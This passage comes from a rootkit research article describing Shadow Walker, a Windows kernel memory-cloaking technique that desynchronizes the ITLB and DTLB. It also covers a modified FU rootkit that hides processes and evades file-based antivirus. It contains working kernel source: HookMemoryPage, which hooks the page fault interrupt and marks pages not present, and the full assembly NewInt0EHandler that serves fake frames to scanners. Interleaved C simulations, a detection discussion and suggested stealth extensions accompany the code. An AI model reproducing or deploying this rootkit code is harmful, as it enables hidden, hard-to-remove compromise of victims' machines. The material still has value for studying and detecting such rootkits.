TLB entry is flushed via the invlpg instruction. This ensures that all
subsequent accesses to the page will be filtered through the installed
page fault handler. Within the installed page fault handler, we determine
whether a given memory access is due to an execute or read/write by
comparing the saved instruction pointer with the faulting address. If they
match, the memory access is due to an execute. Otherwise, it is due to a
read / write. The type of access determines which mapping is manually
loaded into the ITLB or DTLB. Figure 5 provides a conceptual view
of this strategy.

Lastly, it is important to note that TLB access is much faster than
performing a page table lookup. In general, page faults are costly.
Therefore, at first glance, it might appear that marking the hidden pages
not present would incur a significant performance hit. This is, in fact,
not the case. Though we mark the hidden pages not present, for most memory
accesses we do not incur the penalty of a page fault because the entries
are cached in the TLB. The exceptions are, of course, the initial faults
that occur after marking the cloaked page not present and any subsequent
faults which result from cache line evictions when a TLB set becomes full.
Thus, the primary job of the new page fault handler is to explicitly and
selectively load the DTLB or ITLB with the correct mappings for hidden
pages. All faults originating on other pages are passed down to the
operating system page fault handler.

                                                +-------------+
                                 rootkit code   |   FRAME 1   |
  Is it a    +-----------+    /---------------->|             |
  code       |           |    |                 |-------------|
  access?    |   ITLB    |    |                 |   FRAME 2   |
     /------>|-----------|----/                 |             |
     |       |  VPN=12   |                      |-------------|
     |       |  Frame=1  |                      |   FRAME 3   |
     |       +-----------+                      |             |
     |             +-------------+              |-------------|
  MEMORY           | PAGE TABLES |              |   FRAME 4   |
  ACCESS           +-------------+              |             |
  VPN=12                                        |-------------|
     |                                          |   FRAME 5   |
     |       +-----------+                      |             |
     |       |           |                      |-------------|
     |       |   DTLB    |   random garbage     |   FRAME 6   |
     \------>|-----------|--------------------->|             |
  Is it a    |  VPN=12   |                      |-------------|
  data       |  Frame=6  |                      |   FRAME N   |
  access?    +-----------+                      |             |
                                                +-------------+

[ Figure 5 - Faking Read / Writes by Desynchronizing the Split TLB ]
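
The desynchronization in Figure 5 can be simulated in user space. The
sketch below is a deliberately small model, not the driver: each TLB holds
a single entry, each physical frame is reduced to one marker byte, and all
names (machine, on_fault, access_page) are hypothetical. The frame numbers
and VPN follow the figure.

```c
#include <stdbool.h>
#include <stdint.h>

enum { REAL_FRAME = 1, FAKE_FRAME = 6, HOOKED_VPN = 12, NUM_FRAMES = 8 };

typedef struct { bool valid; uint32_t vpn, pfn; } tlb_slot;

typedef struct {
    uint8_t  frames[NUM_FRAMES];  /* one marker byte stands in for a frame */
    tlb_slot itlb, dtlb;          /* one-entry TLBs keep the model small */
    unsigned faults;              /* page faults taken on the hooked page */
} machine;

static void machine_init(machine *m)
{
    *m = (machine){0};
    m->frames[REAL_FRAME] = 0xC3;  /* pretend rootkit code */
    m->frames[FAKE_FRAME] = 0x90;  /* filler shown to anything reading */
}

/* Stand-in for the hooked page fault handler: fill only the TLB that
 * matches the access type, each with a different frame. */
static void on_fault(machine *m, uint32_t vpn, bool is_execute)
{
    m->faults++;
    if (is_execute)
        m->itlb = (tlb_slot){ true, vpn, REAL_FRAME };
    else
        m->dtlb = (tlb_slot){ true, vpn, FAKE_FRAME };
}

/* One access to the hooked page. A TLB miss always faults because the
 * PTE of the hooked page is marked not present. */
static uint8_t access_page(machine *m, uint32_t vpn, bool is_execute)
{
    tlb_slot *t = is_execute ? &m->itlb : &m->dtlb;
    if (!t->valid || t->vpn != vpn)
        on_fault(m, vpn, is_execute);
    return m->frames[t->pfn];
}
```

After one execute and one read of VPN 12 the model has taken two faults;
further accesses of either kind hit in the matching TLB and take none,
which mirrors the performance argument made above.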

----[ 3.2 - Hiding Pure Data

Hiding data modifications is significantly less optimal than hiding code
modifications, but it can be accomplished provided that one is willing to
accept the performance hit. We cause a minimal performance loss when
hiding executable code by virtue of the fact that the ITLB can maintain a
different mapping than the DTLB. Code can execute very fast with a minimum
of page faults because that mapping is always present in the ITLB (except
in the rare event the ITLB entry gets evicted from the cache).
Unfortunately, in the case of data we can't introduce any such
inconsistency. There is only 1 DTLB and consequently that DTLB has to be
kept empty if we are to catch and filter specific data accesses. The end
result is 1 page fault per data access. This may not be a big problem in
terms of hiding a specific driver if the driver is carefully designed and
uses a minimum of global data, but the performance hit could be formidable
when trying to hide a frequently accessed data page.

For data hiding, we have used a protocol based approach between the hidden
driver and the memory hook. We use this to show how one might hide global
data in a rootkit driver. In order to allow the memory access to go through,
the DTLB is loaded in the page fault handler. In order to enforce the
correct filtering of data accesses, however, it must be flushed immediately
by the requesting driver to ensure that no other code accesses that memory
address and receives the data resulting from an incorrect mapping.
The protocol for accessing data on a hidden page is as follows:

1. The driver raises the IRQL to DISPATCH_LEVEL (to ensure that no other
code gets to run which might see the "hidden" data as opposed to the
"fake" data).

2. The driver must explicitly flush the TLB entry for the page containing
the cloaked variable using the invlpg instruction. Some other process
may have attempted to access our data page and been served with the
fake frame; that fake mapping may still reside in the TLB, so we clear
it to be sure we do not receive it.

3. The driver is allowed to perform the data access.

4. The driver must explicitly flush the TLB entry for the page containing
the cloaked variable using the invlpg instruction (i.e. so that the
"real" mapping does not remain in the TLB. We don't want any other
drivers or processes receiving the hidden mapping so we clear it).

5. The driver lowers the IRQL to the previous level before it was raised.

The following additional restriction also applies:

- No global data can be passed to kernel API functions. When calling an
API, global data must be copied into local storage on the stack and
passed into the API function (i.e. if the API accesses the cloaked
variable it will receive fake data and perform incorrectly).
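
The five step protocol can be sketched as follows. This is a user space
simulation under stated assumptions: sim_raise_irql, sim_lower_irql and
sim_invlpg are hypothetical stand-ins that only record the order of
operations. In a real driver they would presumably correspond to
KeRaiseIrql, KeLowerIrql and an invlpg instruction, but nothing here
touches hardware.

```c
#include <stddef.h>
#include <stdint.h>

enum { PASSIVE_LEVEL_SIM = 0, DISPATCH_LEVEL_SIM = 2 };

typedef struct {
    int      irql;         /* current simulated IRQL */
    unsigned tlb_flushes;  /* number of simulated invlpg executions */
    char     log[8];       /* one letter per protocol step */
    size_t   n;
} sim_cpu;

static void step(sim_cpu *c, char tag)
{
    if (c->n < sizeof c->log - 1)
        c->log[c->n++] = tag;
}

static int sim_raise_irql(sim_cpu *c, int level)
{
    int old = c->irql;
    c->irql = level;
    step(c, 'R');
    return old;
}

static void sim_lower_irql(sim_cpu *c, int level)
{
    c->irql = level;
    step(c, 'L');
}

static void sim_invlpg(sim_cpu *c, const volatile void *addr)
{
    (void)addr;            /* the model only counts flushes */
    c->tlb_flushes++;
    step(c, 'F');
}

/* Reads one cloaked variable while following steps 1 to 5. */
static uint32_t read_cloaked(sim_cpu *c, const volatile uint32_t *var)
{
    int old = sim_raise_irql(c, DISPATCH_LEVEL_SIM); /* 1. no preemption  */
    sim_invlpg(c, var);                              /* 2. drop fake view */
    uint32_t value = *var;                           /* 3. the access     */
    step(c, 'A');
    sim_invlpg(c, var);                              /* 4. drop real view */
    sim_lower_irql(c, old);                          /* 5. restore IRQL   */
    return value;
}
```

The log makes the ordering explicit: raise, flush, access, flush, lower.
Skipping the second flush would leave the real mapping in the DTLB for
whatever code runs next.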

This protocol can be efficiently implemented in the hidden driver by having
the driver copy all global data over into local variables at the beginning
of the routine and then copy the data back after the function body has
completed executing. Because stack data is in a constant state of flux, it
is unlikely that a signature could be reliably obtained from global data
on the stack. In this way, there is no need to cause a page fault on every
global access. In general, only one page fault is required to copy over the
data at the beginning of the routine and one fault to copy the data back at
the end of the routine. Admittedly, this disregards more complex issues
involved with multithreaded access and synchronization. An alternative
approach to using a protocol between the driver and PF handler would
be to single step the instruction causing the memory access. This would
be less cumbersome for the driver and yet allow the PF handler to maintain
control of the DTLB (i.e. to flush it after the data access so that it
remains empty).
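
The cost difference between touching cloaked globals directly and using
the copy-in / copy-out approach can be shown with a small counting model.
It assumes, as the text does, that one bulk copy of the globals costs one
page fault. The structure driver_globals and the helper names are
hypothetical.

```c
#include <stdint.h>

typedef struct { uint32_t counter; uint32_t flags; } driver_globals;

static driver_globals g_cloaked;      /* imagine this on a cloaked page */
static unsigned       g_fault_count;  /* faults charged by the model */

/* Every visit to the cloaked page costs one fault, because the DTLB
 * entry is flushed again right after the access. */
static driver_globals load_globals(void)
{
    g_fault_count++;
    return g_cloaked;
}

static void store_globals(driver_globals v)
{
    g_fault_count++;
    g_cloaked = v;
}

/* Naive routine: returns to the cloaked page on every iteration. */
static void bump_naive(unsigned times)
{
    for (unsigned i = 0; i < times; i++) {
        driver_globals g = load_globals();
        g.counter++;
        store_globals(g);
    }
}

/* Copy-in / copy-out: one fault to read, one fault to write back. */
static void bump_copied(unsigned times)
{
    driver_globals local = load_globals();
    for (unsigned i = 0; i < times; i++)
        local.counter++;
    store_globals(local);
}
```

In this model the naive routine pays two faults per iteration, while the
copied version pays two faults in total regardless of the iteration count.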

----[ 3.3 - Related Work

Ironically, the memory cloaking technology discussed in this article is
derived from an existing stack overflow protection scheme known as PaX.
As such, we demonstrate a potentially offensive application of an
originally defensive technology. Though very similar (i.e. taking advantage
of the Pentium split TLB architecture), there are subtle differences
between PaX and the rootkit application of the technology. Whereas our
memory cloaked rootkit enforces execute, diverted read / write semantics,
PaX enforces read / write, no execute semantics. This enables PaX to
provide software support for a non executable stack under the IA-32
architecture, thereby thwarting a large class of stack based buffer
overflow attacks. When a PaX protected system detects an attempted execute
in a read / write only range of memory, it terminates the offending
process. Hardware support for non executable memory has subsequently been
added to the page table entry format for some processors including IA-64
and Pentium 4. In contrast to PaX, our rootkit handler allows
execution to proceed normally while diverting read / write accesses to
the hidden page off to an innocent appearing shadow page. Finally, it should
be noted that PaX uses the PTE user / supervisor bit to generate the
page faults required to enforce its protection. This limits it to protection
of solely user mode pages which is an impractical limitation for a
kernel mode rootkit. As such, we use the PTE present / not present bit
in our implementation.

----[ 3.4 - Proof Of Concept Implementation

Our current implementation uses a modified FU rootkit and a new page fault
handler called Shadow Walker. Since FU alters kernel data structures to
hide processes and does not utilize any code hooks, we only had to be
concerned with hiding the FU driver in memory. The kernel accounts for
every process running on the system by storing an object called an EPROCESS
block for each process in an internal linked list. FU disconnects the
process it wants to hide from this linked list.
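
The unlinking step can be illustrated on an ordinary circular doubly
linked list. The sketch uses the same flink / blink shape as the Windows
LIST_ENTRY, but fake_process is a hypothetical stand-in for EPROCESS and
the code runs entirely in user space.

```c
#include <stddef.h>

/* Same shape as the Windows LIST_ENTRY: circular and doubly linked. */
typedef struct list_entry {
    struct list_entry *flink;  /* next */
    struct list_entry *blink;  /* previous */
} list_entry;

typedef struct {
    unsigned   pid;
    list_entry links;  /* stand-in for the list linkage inside EPROCESS */
} fake_process;

static void list_init(list_entry *head)
{
    head->flink = head->blink = head;
}

static void list_insert_tail(list_entry *head, list_entry *e)
{
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

/* Unlink e from its neighbours, then point it at itself so that a later
 * unlink of the same entry cannot corrupt the list. */
static void list_hide(list_entry *e)
{
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    e->flink = e->blink = e;
}

/* Counts what a tool walking the list would see. */
static size_t list_count(const list_entry *head)
{
    size_t n = 0;
    for (const list_entry *p = head->flink; p != head; p = p->flink)
        n++;
    return n;
}
```

The hidden structure still exists in memory; only traversals of the list
stop reaching it.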

------[ 3.4.a - Modified FU Rootkit

We modified the current version of the FU rootkit taken from rootkit.com.
In order to make it more stealthy, its dependence on a userland
initialization program was removed. Now, all setup information in the form
of OS dependent offsets is derived with a kernel level function. By
removing the userland portion, we eliminated the need to create a symbolic
link to the driver and the need to create a functional device, both of
which are easily detected. Once FU is installed, its image on the file
system can be deleted so all anti-virus scans on the file system will fail
to find it. You can also imagine that FU could be installed from a kernel
exploit and loaded into memory thereby avoiding any image on disk
detection. Also, FU hides all processes whose names are prefixed with
_fu_ regardless of the process ID (PID). We create a System thread that
continually scans this list of processes looking for this prefix. FU and
the memory hook, Shadow Walker, work in collusion; therefore, FU relies on
Shadow Walker to remove the driver from the linked list of drivers in
memory and from the Windows Object Manager's driver directory.
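
The name test that the scanning thread applies could look like the
following. This is a guess at the shape of the check, not FU's actual
code: should_hide and HIDE_PREFIX are hypothetical names, and the image
name is assumed to be available as a NUL terminated string.

```c
#include <stdbool.h>
#include <string.h>

#define HIDE_PREFIX "_fu_"

/* Returns true when the process image name starts with the prefix. */
static bool should_hide(const char *image_name)
{
    return strncmp(image_name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}
```

For example, should_hide("_fu_cmd.exe") is true while should_hide("cmd.exe")
is false.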

------[ 3.4.b - Shadow Walker Memory Hook Engine

Shadow Walker consists of a memory hook installation module and a new page
fault handler. The memory hook module takes the virtual address of the
page to be hidden as a parameter. It uses the information contained in the
address to perform a few sanity checks. Shadow Walker then installs the new
page fault handler by hooking Int 0E (if it has not been previously
installed) and inserts the information about the hidden page into a hash
table so that it can be looked up quickly on page faults. Lastly, the PTE
for the page is marked non present and the TLB entry for the hidden page
is flushed. This ensures that all subsequent accesses to the page are
filtered by the new page fault handler.
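
The hooked page lookup can be sketched as a small open addressing hash
table keyed by virtual page number. The layout is an assumption made for
illustration. The original uses its own HOOKED_LIST_ENTRY structure and
FindPageInHookedList routine, whose internals are not shown in this
article, so hook_slot, hook_insert and hook_find are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define PAGE_SHIFT  12
#define TABLE_SIZE  64

typedef struct {
    uint32_t vpn;             /* virtual page number of the hooked page */
    uint32_t read_write_pfn;  /* frame shown to data accesses */
    int      in_use;
} hook_slot;

static hook_slot g_hooks[TABLE_SIZE];

/* Insert with linear probing. Returns 0 on success, -1 if full. */
static int hook_insert(uint32_t vaddr, uint32_t read_write_pfn)
{
    uint32_t vpn = vaddr >> PAGE_SHIFT;
    for (size_t i = 0; i < TABLE_SIZE; i++) {
        hook_slot *s = &g_hooks[(vpn + i) % TABLE_SIZE];
        if (!s->in_use || s->vpn == vpn) {
            *s = (hook_slot){ vpn, read_write_pfn, 1 };
            return 0;
        }
    }
    return -1;
}

/* Called with the faulting address. Returns NULL if the page is not
 * hooked, in which case the fault would be passed to the OS handler. */
static const hook_slot *hook_find(uint32_t fault_addr)
{
    uint32_t vpn = fault_addr >> PAGE_SHIFT;
    for (size_t i = 0; i < TABLE_SIZE; i++) {
        const hook_slot *s = &g_hooks[(vpn + i) % TABLE_SIZE];
        if (!s->in_use)
            return NULL;      /* an empty slot ends the probe sequence */
        if (s->vpn == vpn)
            return s;
    }
    return NULL;
}
```

Keying on the page number rather than the full address means any byte on
the hooked page resolves to the same entry, and a miss is usually decided
after inspecting a single slot.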

/*************************************************************************
* HookMemoryPage - Hooks a memory page by marking it not present
*                  and flushing any entries in the TLB. This ensures
*                  that all subsequent memory accesses will generate
*                  page faults and be filtered by the page fault handler.
*
* Parameters:
* PVOID pExecutePage - pointer to the page that will be used on
*                      execute access
*
* PVOID pReadWritePage - pointer to the page that will be used to load
*                        the DTLB on data access
*
* PVOID pfnCallIntoHookedPage - A void function which will be called
*                               from within the page fault handler
*                               to load the ITLB on execute accesses
*
* PVOID pDriverStarts (optional) - Sets the start of the valid range
*                                  for data accesses originating from
*                                  within the hidden page.
*
* PVOID pDriverEnds (optional) - Sets the end of the valid range for
*                                data accesses originating from within
*                                the hidden page.
* Return - None
**************************************************************************/
void HookMemoryPage( PVOID pExecutePage, PVOID pReadWritePage,
                     PVOID pfnCallIntoHookedPage, PVOID pDriverStarts,
                     PVOID pDriverEnds )
{
    HOOKED_LIST_ENTRY HookedPage = {0};
    HookedPage.pExecuteView = pExecutePage;
    HookedPage.pReadWriteView = pReadWritePage;
    HookedPage.pfnCallIntoHookedPage = pfnCallIntoHookedPage;
    if( pDriverStarts != NULL)
        HookedPage.pDriverStarts = (ULONG)pDriverStarts;
    else
        HookedPage.pDriverStarts = (ULONG)pExecutePage;

    if( pDriverEnds != NULL)
        HookedPage.pDriverEnds = (ULONG)pDriverEnds;
    else
    {   //set by default if pDriverEnds is not specified
        if( IsInLargePage( pExecutePage ) )
            HookedPage.pDriverEnds =
                (ULONG)HookedPage.pDriverStarts + LARGE_PAGE_SIZE;
        else
            HookedPage.pDriverEnds =
                (ULONG)HookedPage.pDriverStarts + PAGE_SIZE;
    }//end if

    __asm cli //disable interrupts

    if( hooked == false )
    {   HookInt( &g_OldInt0EHandler,
                 (unsigned long)NewInt0EHandler, 0x0E );
        hooked = true;
    }//end if

    HookedPage.pExecutePte = GetPteAddress( pExecutePage );
    HookedPage.pReadWritePte = GetPteAddress( pReadWritePage );

    //Insert the hooked page into the list
    PushPageIntoHookedList( HookedPage );

    //Enable the global page feature
    EnableGlobalPageFeature( HookedPage.pExecutePte );

    //Mark the page non present
    MarkPageNotPresent( HookedPage.pExecutePte );

    //Go ahead and flush the TLBs. We want to guarantee that all
    //subsequent accesses to this hooked page are filtered
    //through our new page fault handler.
    //NOTE: invlpg takes a memory operand, so the page address is
    //loaded into a register first. Using the local variable directly
    //would flush the stack page that holds the pointer instead.
    __asm
    {
        mov eax, pExecutePage
        invlpg [eax]
    }

    __asm sti //reenable interrupts
}//end HookMemoryPage

The functionality of the page fault handler is relatively straightforward
despite the seeming complexity of the scheme. Its primary functions are
to determine if a given page fault is originating from a hooked page,
resolve the access type, and then load the appropriate TLB. As such, the
page fault handler has basically two execution paths. If the page is
unhooked, it is passed down to the operating system page fault handler.
This is determined as quickly and efficiently as possible. Faults
originating from user mode addresses or while the processor is running in
user mode are immediately passed down. The fate of kernel mode accesses is
also quickly decided via a hash table lookup. Alternatively, once the page
has been determined to be hooked the access type is checked and directed to
the appropriate TLB loading code (Execute accesses will cause an ITLB load
while Read / Write accesses cause a DTLB load). The procedure for TLB
loading is as follows:

1. The appropriate physical frame mapping is loaded into the PTE for the
faulting address.
2. The page is temporarily marked present.
3. For a DTLB load, a memory read on the hooked page is performed.
4. For an ITLB load, a call into the hooked page is performed.
5. The page is marked as non present again.
6. The old physical frame mapping for the PTE is restored.

After TLB loading, control is directly returned to the faulting code.
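
Steps 1 through 6 amount to a short sequence of bit operations on a
32-bit, non PAE page table entry. The sketch below runs against an
ordinary variable rather than a live PTE, and the callback stands in for
the memory read or call that makes the CPU cache the mapping. The names
load_tlb_with_frame, touch_fn and record_pte are hypothetical.

```c
#include <stdint.h>

#define PTE_PRESENT     0x00000001u
#define PTE_FLAGS_MASK  0x00000FFFu   /* low 12 bits: flags */
#define PTE_FRAME_MASK  0xFFFFF000u   /* high 20 bits: frame address */

/* Stand-in for the access that loads the TLB. It receives the PTE value
 * the CPU would observe at that moment. */
typedef void (*touch_fn)(uint32_t pte_seen_by_cpu, void *ctx);

static void load_tlb_with_frame(volatile uint32_t *pte, uint32_t shadow_pte,
                                touch_fn touch, void *ctx)
{
    uint32_t saved = *pte;               /* kept for step 6 */

    /* 1. install the shadow frame, keeping the original flag bits */
    *pte = (shadow_pte & PTE_FRAME_MASK) | (saved & PTE_FLAGS_MASK);
    *pte |= PTE_PRESENT;                 /* 2. temporarily present */
    touch(*pte, ctx);                    /* 3 or 4. data read or call */
    *pte &= ~PTE_PRESENT;                /* 5. not present again */
    *pte = saved;                        /* 6. restore the original PTE */
}

/* Example callback: records the PTE value visible during the access. */
static void record_pte(uint32_t pte_seen_by_cpu, void *ctx)
{
    *(uint32_t *)ctx = pte_seen_by_cpu;
}
```

On real hardware the whole sequence would have to run with interrupts
disabled, as the handler listing does with cli and sti.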

/**************************************************************************
* NewInt0EHandler - Page fault handler for the memory hook engine (aka. the
*                   guts of this whole thing)
*
* Parameters - none
*
* Return - none
*
***************************************************************************/
void __declspec( naked ) NewInt0EHandler(void)
{
    __asm
    {
        pushad
        mov edx, dword ptr [esp+0x20] //PageFault.ErrorCode

        test edx, 0x04 //if the processor was in user mode, then
        jnz PassDown   //pass it down

        mov eax,cr2    //faulting virtual address
        cmp eax, HIGHEST_USER_ADDRESS
        jbe PassDown   //we don't hook user pages, pass it down

        ////////////////////////////////////////
        //Determine if it's a hooked page
        /////////////////////////////////////////
        push eax
        call FindPageInHookedList
        mov ebp, eax   //pointer to HOOKED_PAGE structure
        cmp ebp, ERROR_PAGE_NOT_IN_LIST
        jz PassDown    //it's not a hooked page

        ///////////////////////////////////////
        //NOTE: At this point we know it's a
        //hooked page. We also only hook
        //kernel mode pages which are either
        //non paged or locked down in memory
        //so we assume that all page tables
        //are resident to resolve the address
        //from here on out.
        /////////////////////////////////////
        mov eax, cr2
        mov esi, PROCESS_PAGE_DIR_BASE
        mov ebx, eax
        shr ebx, 22
        lea ebx, [esi + ebx*4]   //ebx = pPDE (acts as the PTE for a
                                 //large page)
        test dword ptr [ebx], 0x80 //check if it's a large page
        jnz IsLargePage

        mov esi, PROCESS_PAGE_TABLE_BASE
        mov ebx, eax
        shr ebx, 12
        lea ebx, [esi + ebx*4]   //ebx = pPTE

IsLargePage:

        cmp [esp+0x24], eax      //Is it due to an attempted execute?
        jne LoadDTLB

        ////////////////////////////////
        // It's due to an execute. Load
        // up the ITLB.
        ///////////////////////////////
        cli
        or dword ptr [ebx], 0x01         //mark the page present
        call [ebp].pfnCallIntoHookedPage //load the itlb
        and dword ptr [ebx], 0xFFFFFFFE  //mark page not present
        sti
        jmp ReturnWithoutPassDown

        ////////////////////////////////
        // It's due to a read / write.
        // Load up the DTLB.
        ///////////////////////////////
        ///////////////////////////////
        // Check if the read / write
        // is originating from code
        // on the hidden page.
        ///////////////////////////////
LoadDTLB:
        mov edx, [esp+0x24]      //eip
        cmp edx,[ebp].pDriverStarts
        jb LoadFakeFrame
        cmp edx,[ebp].pDriverEnds
        ja LoadFakeFrame

        /////////////////////////////////
        // If the read / write is originating
        // from code on the hidden page, then
        // let it go through. The code on the
        // hidden page will follow protocol
        // to clear the TLB after the access.
        ////////////////////////////////
        cli
        or dword ptr [ebx], 0x01         //mark the page present
        mov eax, dword ptr [eax]         //load the DTLB
        and dword ptr [ebx], 0xFFFFFFFE  //mark page not present
        sti
        jmp ReturnWithoutPassDown

        /////////////////////////////////
        // We want to fake out this read /
        // write. Our code is not generating
        // it.
        /////////////////////////////////
LoadFakeFrame:
        mov esi, [ebp].pReadWritePte
        mov ecx, dword ptr [esi] //ecx = PTE of the
                                 //read / write page

        //replace the frame with the fake one
        mov edi, [ebx]
        and edi, 0x00000FFF //preserve the lower 12 bits of the
                            //faulting page's PTE
        and ecx, 0xFFFFF000 //isolate the physical address in
                            //the "fake" page's PTE
        or ecx, edi
        mov edx, [ebx]      //save the old PTE so we can replace it
        cli
        mov [ebx], ecx      //replace the faulting page's phys frame
                            //address w/ the fake one

        //load the DTLB
        or dword ptr [ebx], 0x01         //mark the page present
        mov eax, cr2                     //faulting virtual address
        mov eax, dword ptr[eax]          //do data access to load DTLB
        and dword ptr [ebx], 0xFFFFFFFE  //re-mark page not present

        //Finally, restore the original PTE
        mov [ebx], edx
        sti

ReturnWithoutPassDown:
        popad
        add esp,4           //discard the error code
        iretd

PassDown:
        popad
        jmp g_OldInt0EHandler

    }//end asm
}//end NewInt0E
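
The address arithmetic the handler uses to find the page directory entry
and page table entry can be restated in C. The two base constants are an
assumption: 0xC0300000 and 0xC0000000 are the values commonly associated
with the self-mapped page directory and page tables on 32-bit, non PAE
Windows, but the listing above only names the symbols and does not give
their values.

```c
#include <stdint.h>

/* Assumed values for the symbols used by the handler (non PAE x86). */
#define PROCESS_PAGE_DIR_BASE    0xC0300000u
#define PROCESS_PAGE_TABLE_BASE  0xC0000000u
#define PDE_LARGE_PAGE           0x80u   /* PS bit: entry maps 4MB */

/* Top 10 bits of the address index the page directory; entries are
 * 4 bytes wide. Mirrors "shr ebx, 22 / lea ebx, [esi + ebx*4]". */
static uint32_t pde_address(uint32_t va)
{
    return PROCESS_PAGE_DIR_BASE + (va >> 22) * 4u;
}

/* Top 20 bits index the flat, self-mapped array of page table entries.
 * Mirrors "shr ebx, 12 / lea ebx, [esi + ebx*4]". */
static uint32_t pte_address(uint32_t va)
{
    return PROCESS_PAGE_TABLE_BASE + (va >> 12) * 4u;
}

/* Mirrors the "test dword ptr [ebx], 0x80" check in the handler. */
static int pde_maps_large_page(uint32_t pde)
{
    return (pde & PDE_LARGE_PAGE) != 0;
}
```

Under these assumed bases, the virtual address 0x80400000 has its PDE at
0xC0300804 and its PTE at 0xC0201000.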

--[ 4 - Known Limitations & Performance Impact

As our current rootkit is intended only as a proof of concept
demonstration rather than a fully engineered attack tool, it possesses
a number of implementation limitations. Most of the missing functionality
could be added, were one so inclined. First, there is no effort to
support hyperthreading or multiple processor systems. Additionally,
it does not support the Pentium PAE addressing mode which extends
the number of physically addressable bits from 32 to 36. Finally, the
design is limited to cloaking only 4K sized kernel mode pages
(i.e. in the upper 2 GB range of the memory address space). We mention
the 4K page limitation because there are currently some technical
issues with regard to hiding the 4MB page upon which ntoskrnl resides.
Hiding the page containing ntoskrnl would be a noteworthy extension.

In terms of performance, we have not completed rigorous testing, but
subjectively speaking there is no noticeable performance impact after
the rootkit and memory hooking engine are installed. For maximum
performance, as mentioned previously, code and data should remain
on separate pages and the usage of global data should be minimized
to limit the impact on performance if one desires to enable both
data and executable page cloaking.

--[ 5 - Detection

There are at least a few obvious weaknesses that must be dealt with to
avoid detection. Our current proof of concept implementation does not
address them; however, we note them here for the sake of completeness.

Because we must be able to differentiate between normal page faults and
those faults related to the memory hook, we impose the requirement that
hooked pages must reside in non paged memory. Clearly, non present pages
in non paged memory present an abnormality. Whether or not this is a
sufficient heuristic to call a rootkit alarm is, however, debatable.
Locking down pageable memory using an API like MmProbeAndLockPages is
probably more stealthy.

The next weakness lies in the need to disguise the presence of the page
fault handler. Because the page where the page fault handler resides
cannot be marked non present due to the obvious issues with recursive
reentry, it will be vulnerable to a simple signature scan and must be
obfuscated using more traditional methods. Since this routine is small,
written in ASM, and does not rely upon any kernel API's, polymorphism
would be a reasonable solution.

A related weakness arises in the need to disguise the presence of the IDT
hook. We cannot use our memory hooking technique to disguise the
modifications to the interrupt descriptor table for similar reasons as
the page fault handler. While we could hook the page fault interrupt via
an inline hook rather than direct IDT modification, placing a memory hook
on the page containing the OS's INT 0E handler is problematic and inline
hooks are easily detected. Joanna Rutkowska proposed using the debug
registers to hide IDT hooks [5], but Edgar Barbosa demonstrated they are
not a completely effective solution [12]. This is due to the fact that
debug registers protect virtual as opposed to physical addresses. One may
simply remap the physical frame containing the IDT to a different virtual
address and read / write the IDT memory as one pleases. Shadow Walker
falls prey to this type of attack as well, based as it is upon the
exploitation of virtual rather than physical memory. Despite this
acknowledged weakness, most commercial security scanners still perform
virtual rather than physical memory scans and will be fooled by rootkits
like Shadow Walker.

Finally, Shadow Walker is insidious. Even if a scanner detects Shadow
Walker, it will be virtually helpless to remove it on a running system.
Were it to successfully overwrite the hook with the original OS page
fault handler, for example, it would likely BSOD the system because there
would be some page faults occurring on the hidden pages which neither it
nor the OS would know how to handle.
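
The remapping weakness can be demonstrated with a toy model. It is a
sketch only: physical memory is a small array, the cloak is reduced to a
single check on the virtual page number, and toy_system, read_virtual and
scan are hypothetical names. The point it illustrates is that the
diversion is keyed on the virtual address, so a second mapping of the
same frame is not covered.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { FRAME_SIZE = 16, NUM_FRAMES = 4, NUM_VPNS = 8 };

typedef struct {
    uint8_t phys[NUM_FRAMES][FRAME_SIZE];
    int     page_table[NUM_VPNS];  /* vpn -> frame, -1 when unmapped */
    int     hooked_vpn;            /* data reads of this vpn are diverted */
    int     fake_frame;            /* frame served to those reads */
} toy_system;

/* Data read as a virtual memory scanner would perform it. */
static const uint8_t *read_virtual(const toy_system *s, int vpn)
{
    assert(vpn >= 0 && vpn < NUM_VPNS);
    if (vpn == s->hooked_vpn)
        return s->phys[s->fake_frame];   /* the cloak diverts the read */
    assert(s->page_table[vpn] >= 0);     /* page must be mapped */
    return s->phys[s->page_table[vpn]];
}

/* Returns 1 if sig occurs in the page as seen through vpn, else 0. */
static int scan(const toy_system *s, int vpn, const char *sig)
{
    const uint8_t *p = read_virtual(s, vpn);
    size_t n = strlen(sig);
    for (size_t i = 0; i + n <= FRAME_SIZE; i++)
        if (memcmp(p + i, sig, n) == 0)
            return 1;
    return 0;
}
```

A scan through the hooked virtual page comes back clean, while a scan
through a fresh virtual page mapped onto the same physical frame finds
the signature.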

--[ 6 - Conclusion

Shadow Walker is not a weaponized attack tool. Its functionality is
limited and it makes no effort to hide its hook on the IDT or its page
fault handler code. It provides only a practical proof of concept
implementation of virtual memory subversion. By inverting the defensive
software implementation of non executable memory, we show that it is
possible to subvert the view of virtual memory relied upon by the
operating system and almost all security scanner applications. Due to its
exploitation of the TLB architecture, Shadow Walker is transparent and
exhibits an extremely lightweight performance hit. Such characteristics
will no doubt make it an attractive solution for viruses, worms, and
spyware applications in addition to rootkits.
